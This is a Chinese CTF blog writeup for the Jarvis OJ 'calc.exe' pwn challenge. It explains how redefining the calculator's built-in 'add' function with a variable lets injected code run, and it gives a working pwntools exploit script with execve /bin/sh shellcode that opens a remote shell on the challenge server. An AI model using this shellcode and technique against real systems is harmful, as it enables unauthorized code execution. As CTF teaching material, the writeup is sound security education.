jarvis oj pwn calc.exe writeup

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量522 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79337908
版权

这题其实难是难在代码比较多,要审计比较长时间

首先checksec,发现没开NX,估计就是要用shellcode了

然后审计了一波,粗略发现了两个漏洞
1. 没有检查calloc出来那几个堆是否满了,有可能会溢出到下一个堆,但是这里用不了,所以不详细说了
2. 使用var ,可以添加add sub等已经存在的函数,从而实现替代了函数功能的作用

这里用的就是第二个漏洞
var add = “xxxxxx”
然后将shellcode放到引号里面,再输入一个+号,就会执行shellcode,下面是payload

from pwn import *


shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"

#p=process('./calc.exe')
p=remote('pwn2.jarvisoj.com', 9892)

p.sendline('var add = "'+shellcode+'"')
p.sendline('+')

p.interactive()
charlie_heng
关注
专栏目录
2021年春秋杯网络安全联赛秋季赛逆向snake.exeWriteup
m0_58348028的博客
11-28 1万+
pwnable.tw calc writeup
jmp esp
09-27 1674
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
攻防世界PWNcalc2题解
seaaseesa的博客
12-12 1112
calc2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/sh来getshell 发现,该程序是一个四则运算表达式计算程序 其中,我...
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 349
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
最新发布
QYbudong的博客
05-06 1554
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1983
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 266
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 260
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 554
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 510
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
jarvis oj pwn xwork writeup
charlie_heng的专栏
02-21 614
这题没libc,因此利用起来比较麻烦,而且它还去掉了那些one_gadget 首先漏洞很明显,可以use after free,所以可以进行fastbin attack,但是fastbin attack会检查size,所以只能控制某些地方的内存,但是之后怎么用呢? 想了半天,想出一个比较长的利用链,如果有其他比较简便的方法,欢迎交流! 利用链如下: fastbin attack -> ...
jarvis oj pwn hiphop writeup
charlie_heng的专栏
01-24 387
这题真的感觉挺新颖的 首先说下这题的漏洞是什么 条件竞争! 一开始我看到这题是懵逼的,为什么好像常规的下标越界,缓冲区越界之类的都没有 然后其中一个功能又非常奇怪,要开线程? 然后看到这个函数里面某个地方一大堆sleep,于是就猜是条件竞争了 这题是打boss,然后每次都会随机一下出招,只要能预测出出招是什么就能防御 然后回想起以前打pwnable的一题,也是同样靠本地的时间与服务器
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 341
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
jarvis oj DebugMe writeup
charlie_heng的专栏
11-27 606
话说这题真的是玄学做出来的。。。首先看一波main函数sub_A30这里是fork了一个子进制,然后调用ptrace post了一些东西到子进程那里然后这里就是异或了一波输入的东西接着在下面看到有这个东西,也是输入异或了一波这里的判断条件有点看得不是很懂,这里也不多说。。。免得误导这里插了一个breakpoint,目测就是跟上面子进程那里有关在sub_c14里面就是主要的判断逻辑的地方v3就是传进
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1432
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2466
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
Jarvis OJ web WriteUp
heySister
02-08 3745
我要开始做Jarvis OJ上的题目啦!!!之前bugku上还剩下的几道题,之后也会再补上的,做出来之后,就会把思路写到博客里的。新手,有错的地方多多指教。(不是按顺序写的…我就先挑简单的做啦~~~) PORT 51 这个题目用到了curl命令,是利用URL语法在命令行方式下工作的开源为念传输工具….之前没接触过这个命令…我在我的ubuntu虚拟机下运行curl --help ,可以看到如下...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值